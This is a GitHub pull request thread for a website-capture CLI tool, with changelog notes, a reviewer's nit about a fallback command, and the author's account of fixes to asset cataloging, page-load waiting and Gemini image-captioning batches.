Removed --split flow entirely (splitter/, verify/, cssPurger.ts, purgecss dep) — 1,052 lines deleted. Not used by the /website-to-hyperframes skill workflow.

Other (0f3c88d, 44b9cbd)

  • Default timeout 30s → 120s (Shopify needs ~90s for Cloudflare)
  • Sub-agent dispatch instructions in step-6: pass file PATHS not contents, use local fonts not Google Fonts, verify asset refs after each beat
  • verify/index.ts typecheck fix + path traversal guard (before deletion)
  • Step-4 technique count contradiction fixed
  • Step-6 perspective tilt uses gsap.set() instead of CSS transform
  • Step-1 reordered: command first, Gemini note after

Re: adm-zip (#3 from round 1)

adm-zip was not removed — it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip.

Re: ANTHROPIC_API_KEY (#6 from round 2)

Grep confirms zero references to ANTHROPIC_API_KEY in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch. Not restoring a dead env var.

CI fully green (Build, Format, Lint, Test, Runtime contract, Typecheck all pass).
Tested on 20 websites across 3 rounds.

Copy link
Copy Markdown
Collaborator

@jrusso1020 jrusso1020 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

looks good!

Comment on lines +9 to +13
If the built CLI isn't available, fall back to:

```bash
npx tsx packages/cli/src/cli.ts capture <URL> -o captures/<project-name>
```
Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

slight nit but we probably don't need this here?

Copy link
Copy Markdown
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oh yeah we don't it was necessary cause the published package didn't have it haha

Critical: asset cataloger now runs BEFORE extractHtml which converts img
src to data URLs. Framer sites like heykuba.com went from 2 to 78 images.

- networkidle2 instead of networkidle0 (unblocks SPAs with WebSockets)
- Lazy-load wait: scroll to bottom, wait for img.complete
- CSS background-image cataloging for Framer/Webflow
- SVG naming: checks class, id, parent, inner text (not just aria-label)
- Gemini batch 5->20, pause 12s->2s (paid tier: 2000 RPM, ~0.001/img)
- maxOutputTokens 300->500, descriptions sorted captioned-first
- Remove tsx fallback from step-1 (reviewer nit, published CLI has it)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@ularkim
Copy link
Copy Markdown
Author

ularkim commented Apr 16, 2026

Latest push (8af3814) — Capture quality fixes

Found and fixed a critical ordering bug: extractHtml converts all <img src> to data: URLs (for offline HTML export), and the asset cataloger was running AFTER it — finding only data: URLs and skipping them. Framer sites like heykuba.com went from 2 images → 78 images after moving the catalog before the mutation.

Changes

  • Catalog before DOM mutation — read-only operations (tokens, catalog, screenshots, text) now run before extractHtml which mutates the DOM
  • networkidle2 instead of networkidle0 — SPAs with persistent WebSocket connections (like vibecodeapp.com) were timing out, not blocked. networkidle2 allows 2 ongoing connections and is the Puppeteer-recommended default for modern sites
  • Lazy-load image wait — after scrolling, waits for all img.complete before proceeding (Framer IntersectionObserver support)
  • CSS background-image cataloging — scans getComputedStyle(el).backgroundImage on divs for Framer/Webflow sites
  • SVG naming — checks class, id, parent class, inner <text> before falling back to icon-N.svg. NeetCode roadmap is now ngx-graph.svg, FontAwesome icons are fa-twitter.svg, fa-youtube.svg
  • Gemini batching — batch 5→20, pause 12s→2s (paid tier handles 2000 RPM). 78-image site now captions in ~10s instead of 3 min
  • maxOutputTokens 300→500 — descriptions were being truncated mid-sentence
  • Asset descriptions sorted — Gemini-captioned images listed first (richest descriptions), then uncaptioned, then SVGs, then fonts
  • Removed tsx fallback from step-1 per @jrusso1020's nit

Tested on neetcode.io (26 images cataloged, SVGs named correctly), heykuba.com (2→78 images), vibecodeapp.com (was timing out, now captures in ~15s).

@jrusso1020 jrusso1020 merged commit 87f4c77 into main Apr 16, 2026
20 checks passed
@jrusso1020 jrusso1020 deleted the feat/website-capture-design-md branch April 16, 2026 19:03
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

5 participants